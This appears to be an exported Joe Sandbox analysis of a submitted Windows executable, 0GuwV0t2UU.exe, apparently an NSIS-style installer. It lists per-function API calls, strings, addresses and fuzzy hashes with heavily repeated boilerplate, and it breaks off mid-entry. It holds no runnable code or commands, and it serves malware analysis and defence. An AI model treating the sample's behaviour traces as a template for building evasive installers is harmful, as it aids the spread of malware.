                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                        • String ID: A$C:\Users\user\fllesskabsejede\Modfaldent$Call$H/B
                                                        • API String ID: 2624150263-2854008100
                                                        • Opcode ID: 5391f58817f8cb56906519b00545e03f0092e071ef6120135fd40e88676cc4e1
                                                        • Instruction ID: d1d33be9ed2b3c34a6912e34267e60509d8c64d33f654f2361a06684bbdb7283
                                                        • Opcode Fuzzy Hash: 5391f58817f8cb56906519b00545e03f0092e071ef6120135fd40e88676cc4e1
                                                        • Instruction Fuzzy Hash: FBA191B1900209ABDB11AFA5CD41AEFB7B8FF84754F11843BF601B62D1DB7C89418B69
                                                        APIs
                                                        • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040224E
                                                        Strings
                                                        • C:\Users\user\fllesskabsejede\Modfaldent, xrefs: 0040228E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: CreateInstance
                                                        • String ID: C:\Users\user\fllesskabsejede\Modfaldent
                                                        • API String ID: 542301482-4287445359
                                                        • Opcode ID: 0140e218fa6805cd9e9d549b3f46d2fa505c0e185024ac1d7b568c254fc15d58
                                                        • Instruction ID: 6ff6f317fb38c44f87062c5feee8d19efe767a13196ba6052caed3a8697b1732
                                                        • Opcode Fuzzy Hash: 0140e218fa6805cd9e9d549b3f46d2fa505c0e185024ac1d7b568c254fc15d58
                                                        • Instruction Fuzzy Hash: 57410575A00209AFCB00DFE4CA89A9D7BB5FF48318B20457EF505EB2D1DB799981CB54
                                                        APIs
                                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040487E
                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404892
                                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004048AF
                                                        • GetSysColor.USER32(?), ref: 004048C0
                                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004048CE
                                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004048DC
                                                        • lstrlenW.KERNEL32(?), ref: 004048E1
                                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004048EE
                                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404903
                                                        • GetDlgItem.USER32(?,0000040A), ref: 0040495C
                                                        • SendMessageW.USER32(00000000), ref: 00404963
                                                        • GetDlgItem.USER32(?,000003E8), ref: 0040498E
                                                        • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004049D1
                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 004049DF
                                                        • SetCursor.USER32(00000000), ref: 004049E2
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 004049FB
                                                        • SetCursor.USER32(00000000), ref: 004049FE
                                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404A2D
                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404A3F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                        • String ID: Call$N$WG@
                                                        • API String ID: 3103080414-3807701841
                                                        • Opcode ID: 0408aea07e4224223b1525a80d6e9a5543208d2b5c1b62ae9aa87092746790f3
                                                        • Instruction ID: 54d9d544d8a339ed1f673c4731e81340660bcd02aea44dc88bd758a97d32eb83
                                                        • Opcode Fuzzy Hash: 0408aea07e4224223b1525a80d6e9a5543208d2b5c1b62ae9aa87092746790f3
                                                        • Instruction Fuzzy Hash: 2B61A0B1A40209BFDB10AF64CD85AAA7B69FB84314F00843AF605B72D0C779AD51CF98
                                                        APIs
                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406483,?,?), ref: 00406323
                                                        • GetShortPathNameW.KERNEL32(?,004265E8,00000400), ref: 0040632C
                                                          • Part of subcall function 004060F7: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406107
                                                          • Part of subcall function 004060F7: lstrlenA.KERNEL32(00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406139
                                                        • GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 00406349
                                                        • wsprintfA.USER32 ref: 00406367
                                                        • GetFileSize.KERNEL32(00000000,00000000,00426DE8,C0000000,00000004,00426DE8,?,?,?,?,?), ref: 004063A2
                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004063B1
                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063E9
                                                        • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004261E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 0040643F
                                                        • GlobalFree.KERNEL32(00000000), ref: 00406450
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406457
                                                          • Part of subcall function 00406192: GetFileAttributesW.KERNELBASE(00000003,00403138,C:\Users\user\Desktop\0GuwV0t2UU.exe,80000000,00000003), ref: 00406196
                                                          • Part of subcall function 00406192: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004061B8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                        • String ID: %ls=%ls$[Rename]$eB$mB$mB
                                                        • API String ID: 2171350718-2529913679
                                                        • Opcode ID: db523023045b127196975f0173c88122861a3a00dd6e7a8812d5311d7169504c
                                                        • Instruction ID: 9150ff15d44dd6ac7e39c2a3973aa46bc34ee9e674c79fba1fcd409278ee571c
                                                        • Opcode Fuzzy Hash: db523023045b127196975f0173c88122861a3a00dd6e7a8812d5311d7169504c
                                                        • Instruction Fuzzy Hash: A0312370600325BBD2206F65AD49F6B3A5CDF41754F12403AFA02B62D3DA7CD82586BD
                                                        APIs
                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                        • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                        • DrawTextW.USER32(00000000,00428A60,000000FF,00000010,00000820), ref: 00401156
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                        • String ID: F
                                                        • API String ID: 941294808-1304234792
                                                        • Opcode ID: 9a1d1952d02a6587733a796de720c08d05f060e36ce2c67ddab1b612aed24319
                                                        • Instruction ID: 3c33d73dbc2ffdf14e434cca4ae815e9cfbd561affca8d3971a90777bf4c3be5
                                                        • Opcode Fuzzy Hash: 9a1d1952d02a6587733a796de720c08d05f060e36ce2c67ddab1b612aed24319
                                                        • Instruction Fuzzy Hash: 34418B71800249AFCF058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB34DA55DFA4
                                                        APIs
                                                        • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\0GuwV0t2UU.exe",76233420,C:\Users\user\AppData\Local\Temp\,00000000,00403640,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040394F,?,00000008,0000000A,0000000C), ref: 004069B3
                                                        • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069C2
                                                        • CharNextW.USER32(?,"C:\Users\user\Desktop\0GuwV0t2UU.exe",76233420,C:\Users\user\AppData\Local\Temp\,00000000,00403640,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040394F,?,00000008,0000000A,0000000C), ref: 004069C7
                                                        • CharPrevW.USER32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000,00403640,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040394F,?,00000008,0000000A,0000000C), ref: 004069DA
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00406951
                                                        • "C:\Users\user\Desktop\0GuwV0t2UU.exe", xrefs: 00406994
                                                        • *?|<>/":, xrefs: 004069A2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: Char$Next$Prev
                                                        • String ID: "C:\Users\user\Desktop\0GuwV0t2UU.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 589700163-3641266037
                                                        • Opcode ID: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
                                                        • Instruction ID: ee050b90af12f7da754e5e1a7cefda923f304df8a209a79dab08f9ec4fc7f4f9
                                                        • Opcode Fuzzy Hash: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
                                                        • Instruction Fuzzy Hash: 0311B695800612A5DB303B148D40AB7A2F8AF55794F52403FED9AB3AC1EB7C4C9286BD
                                                        APIs
                                                        • GetWindowLongW.USER32(?,000000EB), ref: 004046A5
                                                        • GetSysColor.USER32(00000000), ref: 004046E3
                                                        • SetTextColor.GDI32(?,00000000), ref: 004046EF
                                                        • SetBkMode.GDI32(?,?), ref: 004046FB
                                                        • GetSysColor.USER32(?), ref: 0040470E
                                                        • SetBkColor.GDI32(?,?), ref: 0040471E
                                                        • DeleteObject.GDI32(?), ref: 00404738
                                                        • CreateBrushIndirect.GDI32(?), ref: 00404742
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                        • String ID:
                                                        • API String ID: 2320649405-0
                                                        • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                        • Instruction ID: dc9e33635e48260261a40037ac820fc698cd45b4c1bae75aa0874807b7806060
                                                        • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                        • Instruction Fuzzy Hash: B321A7715007049BCB309F38DA48B5B7BF4AF82714B00893DE9A6B72E0D778E904CB58
                                                        APIs
                                                        • lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                        • lstrlenW.KERNEL32(004030CD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                        • lstrcatW.KERNEL32(00421F28,004030CD,004030CD,00421F28,00000000,00000000,00000000), ref: 00405782
                                                        • SetWindowTextW.USER32(00421F28,00421F28), ref: 00405794
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                        • String ID:
                                                        • API String ID: 2531174081-0
                                                        • Opcode ID: 478899543bd82950d8a4d30903f75c7e93d106f960787587e0f6081d0d83e678
                                                        • Instruction ID: 5626e068ca8b5f19a977ecdc4b6aac72793d852c885f634865ceb3a8b40a731b
                                                        • Opcode Fuzzy Hash: 478899543bd82950d8a4d30903f75c7e93d106f960787587e0f6081d0d83e678
                                                        • Instruction Fuzzy Hash: 6F218E71900558FACB119F65DD849CFBFB9EF45350F10803AF904B62A0C7794A819F68
                                                        APIs
                                                        • DestroyWindow.USER32(00000000,00000000), ref: 0040306E
                                                        • GetTickCount.KERNEL32 ref: 0040308C
                                                        • wsprintfW.USER32 ref: 004030BA
                                                          • Part of subcall function 00405727: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                          • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                          • Part of subcall function 00405727: lstrcatW.KERNEL32(00421F28,004030CD,004030CD,00421F28,00000000,00000000,00000000), ref: 00405782
                                                          • Part of subcall function 00405727: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405794
                                                          • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                          • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                          • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                        • CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 004030DE
                                                        • ShowWindow.USER32(00000000,00000005), ref: 004030EC
                                                          • Part of subcall function 00403037: MulDiv.KERNEL32(0002E1C6,00000064,000356F4), ref: 0040304C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                        • String ID: ... %d%%
                                                        • API String ID: 722711167-2449383134
                                                        • Opcode ID: e30de3e9c70cc1782be0847fd193c9846037557e070c342b8441f703718ebcd4
                                                        • Instruction ID: 97c902a025ac2946b461c4c6cbd0392064296d6115d029b2f7da86e316ad9030
                                                        • Opcode Fuzzy Hash: e30de3e9c70cc1782be0847fd193c9846037557e070c342b8441f703718ebcd4
                                                        • Instruction Fuzzy Hash: 5901A530542320EBCB31AF60AE0AA6B7F6CAB00702F54443BF441B15D5CAB84641CB9E
                                                        APIs
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404FF7
                                                        • GetMessagePos.USER32 ref: 00404FFF
                                                        • ScreenToClient.USER32(?,?), ref: 00405019
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040502B
                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00405051
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: Message$Send$ClientScreen
                                                        • String ID: f
                                                        • API String ID: 41195575-1993550816
                                                        • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                        • Instruction ID: 35c53ee3dfde216a4a17f9e8076a2c946c4c65f0c866826bb74e9a6ab3448864
                                                        • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                        • Instruction Fuzzy Hash: F3015E31900218BADB00DBA4DD85BFFBBBCEF55711F10412BBA51B61D0D7B49A058BA4
                                                        APIs
                                                        • GetDC.USER32(?), ref: 00401E76
